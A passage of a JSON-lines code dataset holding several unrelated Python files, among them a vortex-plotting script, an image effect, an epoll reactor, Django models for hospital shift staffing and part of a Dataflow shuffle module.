text.set_font_properties(font)\n\t# plt.xticks(fontname=\"Consolas\")\n\t# plt.yticks(fontname=\"Consolas\")\n\n\n\n\trect = pylab.Rectangle((-0.5, -0.5), 1, 1, linewidth=0, facecolor=\"#777777\")\n\t# rect = pylab.Rectangle((-10, -10), 10, 10, linewidth=0, facecolor=\"#FF0000\")\n\tplt.gca().add_patch(rect)\n\n\t# plt.title(\"T_Step = \" + '{0:05d}'.format(tStep) + \", time = \" + str(tStep*Tstep2T))\n\tplt.title(\"T_Step = \" + '{0:05d}'.format(tStep) + \", time = \" + '{0:06.1f}'.format(tStep*Tstep2T))\n\t# plt.title(\"T_Step = \" + '{0:05d}'.format(tStep) + \", time = \" + '{0:06.1f}'.format(tStep*Tstep2T), fontname=\"Consolas\")\n\n\t#plt.contour(X, Y, Z, levels=[-0.4, -0.2 ,0, 0.2, 0.4, 0.6, 0.8, 1.0])\n\n\tplt.gca().set_aspect('equal')\n\tfilename = \"output_Tstep=\" + '{0:05d}'.format(tStep) + \".png\"\n\tplt.savefig(filename,dpi=75)\n\n\n\n\t# plt.show()\n\tplt.close()\n\n\t#plt.pause(interval)\n\n\n\ndef ps(output):\n\tsys.stdout.write(str(output))\n\tsys.stdout.flush()\n\n\ndef main():\n\t# task(500)\n\t# for i in xrange(50, 50001, 50):\n\tfor i in xrange(0, 30001, 50):\n\t\t# print i\n\t\tps(i)\n\t\tps(\"\\t\")\n\t\ttask(i)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n","sub_path":"KarmanVortex/visualization/plot_pngset.py","file_name":"plot_pngset.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"85704291","text":"'''\n手绘效果图展示---\n'''\nfrom PIL import Image\nimport numpy as np\nvec_el=np.pi/2.2#光源俯视角度 
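# [Editor's sketch -- not in the original plot script] Minimal reproduction of
# the layering trick used above: thin black contour lines drawn over a filled
# contour with the same levels, plus explicit colorbar ticks (synthetic data):
import numpy as np
import matplotlib.pyplot as plt

x, y = np.meshgrid(np.linspace(-2, 2, 100), np.linspace(-2, 2, 100))
z = np.clip(np.sin(x) * np.cos(y), -0.6, 0.6)     # clamp like the script does
levels = np.linspace(-0.6, 0.6, 12 * 5 + 1)
plt.contour(x, y, z, levels, colors="black", alpha=0.3,
            linewidths=0.3, linestyles="solid")
plt.contourf(x, y, z, levels, cmap=plt.cm.jet)
plt.colorbar(label="Pressure", orientation="horizontal", pad=0.1,
             ticks=np.linspace(-0.6, 0.6, 7))
plt.gca().set_aspect('equal')
plt.savefig("contour_demo.png", dpi=75)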
弧度制\nvec_az=np.pi/4#光源方位角度\ndepth=10#0-100\nim=Image.open('13.jpg').convert('L')\na=np.asarray(im).astype('float')\ngrad=np.gradient(a)#图像灰度的梯度值\ngrad_x,grad_y=grad\ngrad_x=grad_x*depth/100\ngrad_y=grad_y*depth/100\ndx=np.cos(vec_el)*np.cos(vec_az)#光源对x轴的影响\ndy=np.cos(vec_az)*np.cos(vec_el)\ndz=np.sin(vec_el)\nA=np.sqrt(grad_x**2+grad_y**2+1.)\nuni_x=grad_x/A\nuni_y=grad_y/A\nuni_z=1./A\na2=255*(dx*uni_x+dy*uni_y+dz*uni_z)#光源归一化\na2=a2.clip(0,255)\nim2=Image.fromarray(a2.astype('uint8'))#重构图像\nim2.show()\nim2.save('133.jpg')","sub_path":"hand_pic_draw.py","file_name":"hand_pic_draw.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"352596588","text":"import http.server\n#from prometheus_client import start_http_server\n\nAPP_PORT = 8000\n#METRICS_PORT = 8001\n\nclass HandleRequests(http.server.BaseHTTPRequestHandler):\n\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(bytes(\"Mi aplicacion instrumentada
    Cerouno - Demo de instrumentation para Prometheus con Python.
    \", \"utf-8\"))\n self.wfile.close()\n\nif __name__ == \"__main__\":\n #start_http_server(METRICS_PORT)\n server = http.server.HTTPServer(('localhost', APP_PORT), HandleRequests)\n server.serve_forever()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"171726307","text":"import subprocess\n\ncmd = \"gcc -xc - -lpthread\"\nwith open('multi_thread.c') as f:\n pg = f.read().encode('utf8')\n\np = subprocess.Popen(cmd.split(' '), stdin=subprocess.PIPE)\np.communicate(pg)\np.wait()\n\n","sub_path":"programs/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"548837862","text":"import time\nimport heapq\nimport select\nimport logging\n\nfrom hardcoded_settings import MAX_PACKET_SIZE\n\n\nreactor_logger = logging.getLogger('reactor')\n\n\nclass CB(object):\n def __init__(self, func, evt, fileobj, timeout_at):\n self.func = func\n self.evt = evt\n self.fileobj = fileobj\n self.timeout_at = timeout_at\n self.fd = None if fileobj is None else fileobj.fileno()\n\n\nclass Reactor(object):\n def __init__(self):\n self.selector = select.epoll()\n self.fd2cb = {}\n self.callbacks_heap = []\n\n def close(self):\n # TODO(koder): call all callbacks with 'close' exception\n self.selector.close()\n\n def register(self, fileobj, evt, cb_func, timeout):\n if timeout != -1 and timeout is not None:\n timeout_at = timeout + time.time()\n else:\n timeout_at = None\n\n callback = self.fd2cb.get(fileobj.fileno())\n\n if not callback:\n self.selector.register(fileobj, evt)\n callback = CB(cb_func, evt, fileobj, timeout_at)\n self.fd2cb[fileobj.fileno()] = callback\n else:\n assert callback.fileobj is fileobj\n assert callback.evt == evt\n callback.func = cb_func\n callback.timeout_at = timeout_at\n\n if timeout_at is not None:\n heapq.heappush(self.callbacks_heap, (timeout_at, callback))\n\n def unregister(self, fileobj):\n # can't just remove it from list - it can take too long with large lists\n # so make it empty, but don't touch timeout_at - as this will breaks the heap\n # event would be removed upon obtaining from callbacks_heap\n callback = self.fd2cb[fileobj.fileno()]\n\n # if timeout_at is None - this event will never be removed out of heap on timeout\n # have to remove it manually\n if callback.timeout_at is None:\n reactor_logger.warning(\"Removing event with no timeout. 
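# [Editor's sketch] app.py above ships with its prometheus_client lines
# commented out; enabling them would look roughly like this (metric name and
# port are assumptions, not from the original file):
from prometheus_client import Counter, start_http_server

REQUESTS = Counter('app_requests_total', 'Total HTTP requests served')

# inside HandleRequests.do_GET():      REQUESTS.inc()
# in __main__, before serve_forever(): start_http_server(8001)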
This can slow down your code\")\n self.callbacks_heap = [(tout, cb_obj)\n for (tout, cb_obj) in self.callbacks_heap\n if cb_obj is not callback]\n heapq.heapify(self.callbacks_heap)\n else:\n callback.evt = callback.func = callback.fd = callback.fileobj = None\n\n self.selector.unregister(fileobj)\n del self.fd2cb[fileobj.fileno()]\n\n def call_later(self, tout, func):\n call_at = tout + time.time()\n callback = CB(func, None, None, call_at)\n heapq.heappush(self.callbacks_heap, (call_at, callback))\n\n def call_shortly(self, func):\n self.call_later(-1, func)\n\n def serve_forever(self):\n while True:\n ctime = time.time()\n while len(self.callbacks_heap) > 0 and ctime >= self.callbacks_heap[0][0]:\n _, callback = heapq.heappop(self.callbacks_heap)\n if callback.func is None:\n continue\n if callback.timeout_at > ctime:\n heapq.heappush(self.callbacks_heap, (callback.timeout_at, callback))\n else:\n if callback.fileobj is None:\n callback.func()\n else:\n callback.func(None, None)\n ctime = time.time()\n\n if len(self.callbacks_heap) > 0:\n wait_tout = self.callbacks_heap[0][0] - time.time()\n else:\n wait_tout = 1\n\n for fd, _ in self.selector.poll(wait_tout):\n callback = self.fd2cb[fd]\n data, remote_addr = callback.fileobj.recvfrom(MAX_PACKET_SIZE)\n new_cb, data = callback.func(remote_addr, data)\n\n if data is not None:\n callback.fileobj.sendto(data, remote_addr)\n\n if new_cb is None:\n fobj = callback.fileobj\n self.unregister(callback.fileobj)\n fobj.close()\n else:\n callback.func = new_cb\n","sub_path":"py/reactor.py","file_name":"reactor.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"604760331","text":"from .models import Tree\nfrom django.db.models import Q\nfrom functools import reduce\n\n\ndef get_filter_query(key, value):\n if key == 'type':\n return Q(type=value)\n elif key == 'soil':\n return Q(soil=value)\n elif key == 'sun':\n return Q(sun=value)\n elif key == 'food':\n return Q(food='food')\n elif key == 'water':\n return Q(water=value)\n elif key == 'pruning':\n return Q(pruning=value)\n elif key == 'height':\n ranges = value.split('-')\n if len(ranges) == 1:\n if '>' in ranges[0]:\n query = Q(max_height__gte=ranges[0])\n else:\n query = Q(max_height__lte=ranges[0])\n else:\n query = Q(max_height__gte=ranges[0]) & Q(max_height__lte=ranges[1])\n return query\n elif key == 'growth_rate':\n return Q(growth_rate=value)\n elif key == 'price':\n return Q(price__lte=value)\n else:\n return Q(type='hedge')\n\n\ndef search_for_tree(keywords, filters):\n if keywords == '':\n return []\n queries = [Q(name__contains=kw) for kw in keywords.split()]\n query = reduce(lambda curr, new: curr | new, queries)\n query_set = Tree.objects.filter(query)\n if len(filters) != 0:\n if 'price' in filters:\n filters['price'] = int(filters['price'])\n filter_list = [get_filter_query(key, value) for key, value in filters.items()]\n filter_query = reduce(lambda curr, new: curr & new, filter_list)\n query_set = query_set.filter(filter_query)\n\n return query_set\n","sub_path":"plantatree/store/searching.py","file_name":"searching.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"77327701","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\nimport datetime\nfrom django.utils import timezone\n\nfrom django.db.models.signals import post_save\nfrom
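# [Editor's note] The reduce() calls in searching.py above are a common Django
# idiom; operator.or_ / operator.and_ can replace the lambdas. Equivalent
# sketch (the model and keywords are illustrative):
import operator
from functools import reduce
from django.db.models import Q

keywords = ["oak", "maple"]
query = reduce(operator.or_, (Q(name__contains=kw) for kw in keywords))
# Tree.objects.filter(query)  -> rows whose name contains "oak" OR "maple"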
django.dispatch import receiver\n\n\nclass Profile(models.Model):\n\n PORTFOLIO_CHOICES = [\n ('ALL PORTFOLIOS', 'ALL PORTFOLIOS'),\n ('Acute', 'Acute'),\n ('MH', 'MH'),\n ]\n\n DESIGNATION_CHOICES = [\n ('ALL DESIGNATIONS', 'ALL DESIGNATIONS'),\n ('Clerk', 'Clerk'),\n ('ENV', 'ENV'),\n ('Escort', 'Escort'),\n ('PFN', 'PFN'),\n ('PFS', 'PFS'),\n ('PSW', 'PSW'),\n ('RBA', 'RBA'),\n ('RN', 'RN'),\n ('RPN', 'RPN'),\n ('SSW', 'SSW'),\n ('Tech', 'Tech'),\n ]\n\n UNIT_CHOICES = [\n ('ALL UNITS', 'ALL UNITS'),\n ('A1 B1 C1', 'A1 B1 C1'),\n ('A1-Ever/B1', 'A1-Ever/B1'),\n ('A1/B1', 'A1/B1'),\n ('A3/B3', 'A3/B3'),\n ('A3/B3 IP Surgery', 'A3/B3 IP Surgery'),\n ('ACU', 'ACU'),\n ('ACU - SSW', 'ACU - SSW'),\n ('AIPU', 'AIPU'),\n ('Admissions', 'Admissions'),\n ('Birch/Maple', 'Birch/Maple'),\n ('Birch/Maple - DSW', 'Birch/Maple - DSW'),\n ('Birthing', 'Birthing'),\n ('Birthing/Peds', 'Birthing/Peds'),\n ('C1', 'C1'),\n ('C3', 'C3'),\n ('C3/D3', 'C3/D3'),\n ('C3/D3 - UL', 'C3/D3 - UL'),\n ('CAMHU', 'CAMHU'),\n ('CCU', 'CCU'),\n ('Cedar', 'Cedar'),\n ('Chemo', 'Chemo'),\n ('D3', 'D3'),\n ('Day Surgery', 'Day Surgery'),\n ('E3 Flex', 'E3 Flex'),\n ('ER', 'ER'),\n ('Forensics', 'Forensics'),\n ('GEM', 'GEM'),\n ('General', 'General'),\n ('NICU', 'NICU'),\n ('Northern', 'Northern'),\n ('OR', 'OR'),\n ('OR - RBA', 'OR - RBA'),\n ('Osprey', 'Osprey'),\n ('PAC', 'PAC'),\n ('PFN', 'PFN'),\n ('Peds', 'Peds'),\n ('Peri-Op', 'Peri-Op'),\n ('Pharmacy Techs', 'Pharmacy Techs'),\n ('Renal', 'Renal'),\n ('Renal - Aides', 'Renal - Aides'),\n ('Staffing', 'Staffing'),\n ('Sudbury (Oak & Nickel)', 'Sudbury (Oak & Nickel)'),\n ('TM', 'TM'),\n ]\n\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n portfolio_filter = models.CharField(max_length=20, choices=PORTFOLIO_CHOICES, default='ALL PORTFOLIOS', verbose_name='Portfolio Filter')\n designation_filter = models.CharField(max_length=20, choices=DESIGNATION_CHOICES, default='ALL DESIGNATIONS', verbose_name='Designation Filter')\n unit_filter = models.CharField(max_length=40, choices=UNIT_CHOICES, default='ALL UNITS', verbose_name = 'Unit Filter')\n\n @receiver(post_save, sender=User) # https://simpleisbetterthancomplex.com/tutorial/2016/07/22/how-to-extend-django-user-model.html#onetoone\n def create_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n\n @receiver(post_save, sender=User)\n def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()\n\nclass Designation(models.Model):\n\n DESIGNATION_CHOICES = [\n ('Clerk', 'Clerk'),\n ('ENV', 'ENV'),\n ('Escort', 'Escort'),\n ('PFN', 'PFN'),\n ('PFS', 'PFS'),\n ('PSW', 'PSW'),\n ('RBA', 'RBA'),\n ('RN', 'RN'),\n ('RPN', 'RPN'),\n ('SSW', 'SSW'),\n ('Tech', 'Tech'),\n ]\n\n # id = models.AutoField(primary_key=True) # By default, Django gives each model this field\n designation = models.CharField(max_length=20, choices=DESIGNATION_CHOICES, verbose_name='Designation', primary_key=True)\n\n class Meta:\n verbose_name = 'Designation'\n verbose_name_plural = 'Designations'\n ordering = ['designation']\n\n def __str__(self):\n return ', '.join([self.designation])\n\n\nclass Staff(models.Model):\n\n TYPE_TRIMMED_CHOICES = [\n ('FT', 'FT'),\n ('PT', 'PT'),\n ('CASUAL', 'CASUAL'),\n ]\n\n UNION_CHOICES = [\n ('CUPE', 'CUPE'),\n ('ONA', 'ONA'),\n ]\n\n DEPARTMENT_CHOICES = [\n ('UNASSIGNED', 'UNASSIGNED'),\n ('A1 B1 C1', 'A1 B1 C1'),\n ('A1-Ever/B1', 'A1-Ever/B1'),\n ('A1/B1', 'A1/B1'),\n ('A3/B3', 'A3/B3'),\n ('A3/B3 IP Surgery', 'A3/B3 IP 
Surgery'),\n ('ACU', 'ACU'),\n ('ACU - SSW', 'ACU - SSW'),\n ('AIPU', 'AIPU'),\n ('Admissions', 'Admissions'),\n ('Birch/Maple', 'Birch/Maple'),\n ('Birch/Maple - DSW', 'Birch/Maple - DSW'),\n ('Birthing', 'Birthing'),\n ('Birthing/Peds', 'Birthing/Peds'),\n ('C1', 'C1'),\n ('C3', 'C3'),\n ('C3/D3', 'C3/D3'),\n ('C3/D3 - UL', 'C3/D3 - UL'),\n ('CAMHU', 'CAMHU'),\n ('CCU', 'CCU'),\n ('Cedar', 'Cedar'),\n ('Chemo', 'Chemo'),\n ('D3', 'D3'),\n ('Day Surgery', 'Day Surgery'),\n ('E3 Flex', 'E3 Flex'),\n ('ER', 'ER'),\n ('Forensics', 'Forensics'),\n ('GEM', 'GEM'),\n ('General', 'General'),\n ('NICU', 'NICU'),\n ('Northern', 'Northern'),\n ('OR', 'OR'),\n ('OR - RBA', 'OR - RBA'),\n ('Osprey', 'Osprey'),\n ('PAC', 'PAC'),\n ('PFN', 'PFN'),\n ('Peds', 'Peds'),\n ('Peri-Op', 'Peri-Op'),\n ('Pharmacy Techs', 'Pharmacy Techs'),\n ('Renal', 'Renal'),\n ('Renal - Aides', 'Renal - Aides'),\n ('Staffing', 'Staffing'),\n ('Sudbury (Oak & Nickel)', 'Sudbury (Oak & Nickel)'),\n ('TM', 'TM'),\n ]\n\n # id = models.AutoField(primary_key=True) # By default, Django gives each model this field\n name = models.CharField(max_length=30, verbose_name='Name')\n union = models.CharField(max_length=20, choices=UNION_CHOICES, verbose_name='Union')\n contract = models.CharField(max_length=15, verbose_name='Contract')\n type = models.CharField(max_length=15, verbose_name='Type')\n type_trimmed = models.CharField(max_length=15, choices=TYPE_TRIMMED_CHOICES, verbose_name='Type Trimmed')\n status = models.CharField(max_length=15, null=True, blank=True, verbose_name='Status')\n job_title = models.CharField(max_length=50, verbose_name='Job Title')\n department = models.CharField(max_length=50, choices=DEPARTMENT_CHOICES, verbose_name='Department', default='UNASSIGNED')\n designations = models.ManyToManyField(Designation, blank=True, verbose_name='Designations')\n phone_number = models.CharField(max_length=20, null=True, blank=True, verbose_name='Phone Number')\n start_date = models.DateField(null=True, blank=True, verbose_name='Start Date') # Keep both\n seniority_hours = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, verbose_name='Seniority Hours') # Keep both\n\n class Meta:\n verbose_name = 'Staff'\n verbose_name_plural = 'Staff'\n ordering = ['name']\n\n def __str__(self):\n designations_list = []\n try:\n for designation in self.designations.all():\n designations_list.append(str(designation))\n return ', '.join([self.name, self.union, self.type_trimmed, self.department, str(designations_list), str(self.seniority_hours)])\n except Exception:\n return ', '.join([self.name, self.union, self.type_trimmed, self.department, str(self.seniority_hours)])\n\nclass Posting(models.Model):\n\n SHIFT_TIME_OF_DAY_CHOICES = [\n ('Day', 'Day'),\n ('Evening', 'Evening'),\n ('Night', 'Night'),\n ]\n\n SHIFT_LENGTH_CHOICES = [\n ('8 Hours', '8 Hours'),\n ('12 Hours', '12 Hours'),\n ]\n\n PORTFOLIO_CHOICES = [\n ('Acute', 'Acute'),\n ('Mental Health', 'Mental Health'),\n ]\n\n UNIT_CHOICES = [\n ('A1 B1 C1', 'A1 B1 C1'),\n ('A1-Ever/B1', 'A1-Ever/B1'),\n ('A1/B1', 'A1/B1'),\n ('A3/B3', 'A3/B3'),\n ('A3/B3 IP Surgery', 'A3/B3 IP Surgery'),\n ('ACU', 'ACU'),\n ('ACU - SSW', 'ACU - SSW'),\n ('AIPU', 'AIPU'),\n ('Admissions', 'Admissions'),\n ('Birch/Maple', 'Birch/Maple'),\n ('Birch/Maple - DSW', 'Birch/Maple - DSW'),\n ('Birthing', 'Birthing'),\n ('Birthing/Peds', 'Birthing/Peds'),\n ('C1', 'C1'),\n ('C3', 'C3'),\n ('C3/D3', 'C3/D3'),\n ('C3/D3 - UL', 'C3/D3 - UL'),\n ('CAMHU', 'CAMHU'),\n ('CCU', 'CCU'),\n 
('Cedar', 'Cedar'),\n ('Chemo', 'Chemo'),\n ('D3', 'D3'),\n ('Day Surgery', 'Day Surgery'),\n ('E3 Flex', 'E3 Flex'),\n ('ER', 'ER'),\n ('Forensics', 'Forensics'),\n ('GEM', 'GEM'),\n ('General', 'General'),\n ('NICU', 'NICU'),\n ('Northern', 'Northern'),\n ('OR', 'OR'),\n ('OR - RBA', 'OR - RBA'),\n ('Osprey', 'Osprey'),\n ('PAC', 'PAC'),\n ('PFN', 'PFN'),\n ('Peds', 'Peds'),\n ('Peri-Op', 'Peri-Op'),\n ('Pharmacy Techs', 'Pharmacy Techs'),\n ('Renal', 'Renal'),\n ('Renal - Aides', 'Renal - Aides'),\n ('Staffing', 'Staffing'),\n ('Sudbury (Oak & Nickel)', 'Sudbury (Oak & Nickel)'),\n ('TM', 'TM'),\n ]\n\n REASON_FOR_REPLACEMENT_CHOICES = [\n ('Bereavement', 'Bereavement'),\n ('Escort', 'Escort'),\n ('Extra', 'Extra'),\n ('LSS', 'LSS'),\n ('Modified', 'Modified'),\n ('Need', 'Need'),\n ('Quarantine', 'Quarantine'),\n ('Replace', 'Replace'),\n ('Sick', 'Sick'),\n ('1 to 1', '1 to 1'),\n ]\n\n STATUS_CHOICES = [\n ('Open', 'Open'),\n ('Pending', 'Pending'),\n ('Closed', 'Closed'),\n ]\n\n # null and blank arguments are False by default\n # null doesn't allow null in the database, blank is not database-related; it prevents '' in forms\n\n # id = models.AutoField(primary_key=True) # By default, Django gives each model this field\n shift_date = models.DateField(verbose_name='Shift Date')\n shift_time_of_day = models.CharField(max_length=30, choices=SHIFT_TIME_OF_DAY_CHOICES, verbose_name='Shift Time of Day')\n shift_length = models.CharField(max_length=30, choices=SHIFT_LENGTH_CHOICES, verbose_name='Shift Length')\n shift_time_range = models.CharField(max_length=30, null=True, blank=True, verbose_name='Shift Time Range (24 hr.)')\n portfolio = models.CharField(max_length=20, choices=PORTFOLIO_CHOICES, verbose_name='Portfolio')\n designation_required = models.ForeignKey(Designation, on_delete=models.SET_NULL, null=True, blank=False, verbose_name='Designation Required') # null=True so that in case a Designation is deleted, we don't lose any Postings\n unit = models.CharField(max_length=50, choices=UNIT_CHOICES, verbose_name='Unit')\n called_in_by = models.CharField(max_length=60, null=True, blank=True, verbose_name='Called In By')\n reason_for_replacement = models.CharField(max_length=50, null=True, blank=True, choices=REASON_FOR_REPLACEMENT_CHOICES, verbose_name='Reason for Replacement')\n absentee = models.ForeignKey(Staff, on_delete=models.CASCADE, null=True, blank=True, verbose_name='Absentee', related_name='absentee')\n extra_shift = models.BooleanField(verbose_name='Extra Shift', default=False)\n overtime_approved = models.BooleanField(verbose_name='Overtime Approved', default=False)\n comment = models.TextField(null=True, blank=True, verbose_name='Comment')\n\n overtime_hours = models.DecimalField(max_digits=4, decimal_places=2, default=0, verbose_name='Overtime Hours')\n consecutive_weekend_ot = models.BooleanField(verbose_name='Consecutive Weekend OT', default=False)\n staff_id = models.ForeignKey(Staff, on_delete=models.SET_NULL, null=True, blank=True, verbose_name='Replacement', related_name='replacement') # null=True so that in case a Staff is deleted, we don't lose any Postings\n absentee_unit_notified = models.BooleanField(verbose_name='Absentee\\'s Unit Notified', default=False)\n replace_unit_notified = models.BooleanField(verbose_name='Replacement\\'s Unit Notified', default=False)\n who_was_informed = models.CharField(max_length=40, null=True, blank=True, verbose_name='Who Was Informed')\n\n status = models.CharField(max_length=30, choices=STATUS_CHOICES, verbose_name='Status', 
default='Open')\n posting_created_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, verbose_name='Posting Created By', related_name='posting_created_by')\n posting_closed_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, blank=True, verbose_name='Posting Closed By', related_name='posting_closed_by')\n posting_created_datetime = models.DateTimeField(auto_now_add=True, verbose_name='Posting Created DateTime') # Any field with the auto_now attribute set will also inherit editable=False and won't show in admin panel\n posting_closed_datetime = models.DateTimeField(null=True, blank=True, verbose_name='Posting Closed DateTime')\n\n class Meta:\n verbose_name = 'Posting'\n verbose_name_plural = 'Postings'\n ordering = ['shift_date', 'portfolio', 'designation_required', 'unit']\n\n def __str__(self):\n\n if self.shift_time_range is None:\n return ', '.join([str(self.id), str(self.shift_date)[0:10], self.portfolio, self.shift_time_of_day, self.shift_length, self.unit, self.status])\n\n return ', '.join([str(self.id), str(self.shift_date)[0:10], self.portfolio, self.shift_time_of_day, self.shift_length, self.shift_time_range, self.unit, self.status])\n\n\nclass PossibleReplacement(models.Model):\n # CASCADE, PROTECT, SET_NULL, SET_DEFAULT, SET()\n posting_id = models.ForeignKey(Posting, on_delete=models.CASCADE, verbose_name='Posting ID')\n staff_id = models.ForeignKey(Staff, on_delete=models.CASCADE, verbose_name='Staff ID')\n contacted = models.BooleanField(verbose_name='Contacted', default=False) # The form follows the model, and will show 'Contacted' on GET call for even a blank form\n result = models.CharField(max_length=150, null=True, blank=True, verbose_name='Result')\n contacter = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, blank=True, verbose_name='Contacter')\n contacted_datetime = models.DateTimeField(null=True, blank=True, verbose_name='Contacted DateTime')\n\n took_shift = models.BooleanField(verbose_name='Took Shift', default=False)\n overtime_granted = models.BooleanField(verbose_name='Overtime Granted', default=False) # Overtime is granted for this staff member?\n overtime_hours = models.DecimalField(max_digits=4, decimal_places=2, default=0, verbose_name='Overtime Hours')\n consecutive_weekend_ot = models.BooleanField(verbose_name='Consecutive Weekend OT', default=False)\n absentee_unit_notified = models.BooleanField(verbose_name='Absentee\\'s Unit Notified', default=False)\n replace_unit_notified = models.BooleanField(verbose_name='Replacement\\'s Unit Notified', default=False)\n who_was_informed = models.CharField(max_length=40, null=True, blank=True, verbose_name='Who Was Informed')\n\n\n class Meta:\n verbose_name = 'Possible Replacement'\n verbose_name_plural = 'Possible Replacements'\n ordering = ['-posting_id']\n\n def __str__(self):\n return ', '.join([str(self.posting_id.id), str(self.staff_id.id)])\n\n\nclass SeniorityFilesUpload(models.Model):\n\n upload_datetime = models.DateTimeField(auto_now_add=True, verbose_name='Upload DateTime')\n uploader = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, verbose_name='Uploader', related_name='uploader')\n cupe = models.FileField(upload_to='Seniority Lists/', null=True, blank=True, verbose_name='CUPE')\n ona = models.FileField(upload_to='Seniority Lists/', null=True, blank=True, verbose_name='ONA')\n\n class Meta:\n verbose_name = 'Seniority File'\n verbose_name_plural = 'Seniority Files'\n ordering = ['-upload_datetime']\n\n def __str__(self):\n return ', 
'.join([str(self.upload_datetime), str(self.uploader)])\n","sub_path":"scheduler/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"652865701","text":"# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Shuffle sources and sinks.\n\nThe worker code communicates with the shuffler using a shuffle client library\n(see shuffle_client below). The shuffle operates with entries consisting of a\n4-tuple: position, key, secondary key (a.k.a. 2nd-key), value.\nAll values are just raw bytes. On the wire a shuffle entry is represented as a\nsequence of length and bytes tuples in the order mentioned above. The length\nis represented as a 4 byte big endian\ninteger.\n\nThe semantics when reading from shuffle is that values are grouped by key and\nthe values associated with a key are sorted by the secondary key. The opaque\nposition information returned for each shuffle entry can be used to reiterate\nover values several times and in general to read in a non-sequential manner.\n\nThe shuffle source supports reiterating over values and values returned\nhave indefinite lifetimes, are stateless and immutable.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport base64\nimport cStringIO as StringIO\nimport logging\nimport struct\n\nfrom google.cloud.dataflow.coders import observable\nfrom google.cloud.dataflow.io import iobase\nfrom google.cloud.dataflow.io import range_trackers\n\n\n# The following import works perfectly fine for the Dataflow SDK properly\n# installed. However in the testing environment the module is not available\n# since it is built elsewhere. The tests rely on the test_reader/test_writer\n# arguments for shuffle readers and writers respectively to inject alternative\n# implementations.\ntry:\n from google.cloud.dataflow.worker import shuffle_client # pylint: disable=g-import-not-at-top\nexcept ImportError:\n pass\n\n\ndef _shuffle_decode(parameter):\n \"\"\"Decodes a shuffle parameter.\n\n The parameters used to initialize a shuffle source or shuffle sink are sent\n by the service as urlsafe_base64 Unicode strings. 
In addition, the encoding\n does not contain the '=' padding expected by the base64 library.\n\n The parameters using this encoding are: shuffle reader positions (start/end),\n and shuffle reader/writer configuration protobufs.\n\n Args:\n parameter: A Unicode string encoded using urlsafe_base64.\n\n Returns:\n Decoded string.\n \"\"\"\n # Convert to str and compensate for the potential lack of padding.\n parameter = str(parameter)\n if len(parameter) % 4 != 0:\n parameter += '=' * (4 - len(parameter) % 4)\n return base64.urlsafe_b64decode(parameter)\n\n\nclass ShuffleEntry(object):\n \"\"\"A (position, key, 2nd-key, value) tuple as used by the shuffle library.\"\"\"\n\n def __init__(self, key, secondary_key, value, position):\n self.key = key\n self.secondary_key = secondary_key\n self.value = value\n self.position = position\n\n def __str__(self):\n return '<%s>' % self._str_internal()\n\n def __repr__(self):\n return '<%s at %s>' % (self._str_internal(), hex(id(self)))\n\n def _str_internal(self):\n return 'ShuffleEntry %s%s' % (self.key, '/%s' % self.secondary_key\n if self.secondary_key != self.key else '')\n\n def __eq__(self, other):\n return (self.key == other.key and\n self.secondary_key == other.secondary_key and\n self.value == other.value and\n self.position == other.position)\n\n @property\n def size(self):\n \"\"\"Returns the size in bytes of the serialized entry.\"\"\"\n return (16 + len(self.key) + len(self.secondary_key) + len(self.value) +\n (len(self.position) if self.position else 0))\n\n def to_bytes(self, stream, with_position=True):\n \"\"\"Writes the serialized shuffle entry to the stream.\n\n Args:\n stream: A StringIO where the bytes are written to.\n with_position: True whenever reading from shuffle. False when we write\n an entry to the shuffle.\n \"\"\"\n # The struct.pack '>I' specifier means 32 bit big endian integer.\n if with_position:\n stream.write(struct.pack('>I', len(self.position)))\n stream.write(self.position)\n stream.write(struct.pack('>I', len(self.key)))\n stream.write(self.key)\n stream.write(struct.pack('>I', len(self.secondary_key)))\n stream.write(self.secondary_key)\n stream.write(struct.pack('>I', len(self.value)))\n stream.write(self.value)\n\n @staticmethod\n def from_stream(stream, with_position=True):\n \"\"\"Returns a shuffle entry read from a StringIO stream.\n\n Args:\n stream: StringIO stream to read the bytes from.\n with_position: False only for tests when we want to read something that\n was written to the shuffle without a position. 
